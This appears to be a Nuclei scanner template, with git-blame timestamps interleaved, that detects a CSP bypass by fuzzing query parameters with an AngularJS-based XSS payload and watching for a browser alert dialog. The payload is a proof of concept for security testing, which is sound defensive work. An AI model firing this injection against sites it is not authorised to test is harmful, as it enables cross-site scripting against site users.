2025-02-21 22:48:07 +05:30
|
|
|
id: angularjs-code-csp-bypass
|
|
|
|
|
|
|
|
|
|
info:
|
2025-03-10 17:24:16 +05:30
|
|
|
name: Content-Security-Policy Bypass - AngularJS Code
|
2025-02-21 22:48:07 +05:30
|
|
|
author: renniepak,DhiyaneshDK
|
|
|
|
|
severity: medium
|
|
|
|
|
reference:
|
|
|
|
|
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
2025-05-27 10:39:47 +08:00
|
|
|
tags: xss,csp-bypass,angularjs-code
|
2025-02-21 22:48:07 +05:30
|
|
|
|
2025-03-06 22:45:16 +05:30
|
|
|
flow: http(1) && headless(1)
|
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}"
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: header
|
|
|
|
|
words:
|
|
|
|
|
- "Content-Security-Policy"
|
2025-03-07 17:28:54 +05:30
|
|
|
- "angularjs.org"
|
|
|
|
|
condition: and
|
2025-03-06 22:45:16 +05:30
|
|
|
internal: true
|
|
|
|
|
|
2025-02-21 22:48:07 +05:30
|
|
|
headless:
|
|
|
|
|
- steps:
|
|
|
|
|
- action: navigate
|
|
|
|
|
args:
|
|
|
|
|
url: "{{BaseURL}}"
|
|
|
|
|
|
|
|
|
|
- action: waitdialog
|
|
|
|
|
name: angularjs_code_csp_xss
|
|
|
|
|
args:
|
|
|
|
|
max-duration: 5s
|
|
|
|
|
|
|
|
|
|
payloads:
|
|
|
|
|
injection:
|
|
|
|
|
- '<script src="https://code.angularjs.org/1.8.2/angular.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
|
|
|
|
|
|
|
|
|
|
fuzzing:
|
|
|
|
|
- part: query
|
|
|
|
|
type: replace
|
|
|
|
|
mode: single
|
|
|
|
|
fuzz:
|
|
|
|
|
- "{{url_encode(injection)}}"
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
|
|
|
|
- "angularjs_code_csp_xss == true"
|
2025-03-10 11:57:49 +00:00
|
|
|
# digest: 4a0a00473045022100f71008e67eeaa6f86966ee34f89e3a384a576b369bf705c1a2ab47e6ee465e96022074876b521ae61f16a15c4a6cf5c3134ef22451c5ee35f263e9096a89d3900288:922c64590222798bb761d5b6d8e72950
|
